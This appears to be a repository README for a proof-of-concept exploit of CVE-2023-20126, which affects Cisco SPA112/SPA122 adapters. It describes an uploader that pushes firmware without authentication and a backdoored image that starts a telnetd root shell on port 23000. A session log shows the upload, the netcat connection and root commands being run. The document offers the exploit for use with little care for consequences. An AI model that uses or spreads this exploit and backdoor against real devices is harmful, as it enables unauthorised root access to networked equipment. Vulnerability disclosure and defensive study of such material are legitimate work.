Minimum Viable PoC for CVE-2023-20126
This is the initial release. It works, but its the 'simplest case' exploit.
Tested and working on SPA112/SPA122 - SPA232D requires a different firmware image.
Gives a root-shell on port 23000/tcp.
I still need to clean up the toolchain used for editing the firmware and will probably put that in a different repo. It is mostly based on the work of @BigNerd95, but with minor alterations to work on the SPA112/122 firmware files.
$ python3 CFW.bin
Base URL:
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.
< wait a few mins, nervously >
$ nc -v 23000
Connection to port 23000 [tcp/inovaport1] succeeded!
BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
# cat /etc/version
cat /etc/version
build_date:Mon Oct 14 12:48:12 CST 2019
- - firmware image uploader that bypasses auth by simply not sending any, exploiting CVE-2023-20126. takes two arguments: URL of the devices Web UI, and firmware file to upload.
- telnet-23000.bin - Proof of Concept malicious firmware image that spawns
telnetd -l /bin/sh -p 23000
, giving a root shell on port 23000/tcp. Based on work by bignerd95.
use git issue.
If this bricks your fucking device, I don't take any responsibility.
That is YOUR problem.
I mean, I hacked together that backdoored firmware in an evening.
Also, why aren't you following the writeup and building your own backdoored firmware?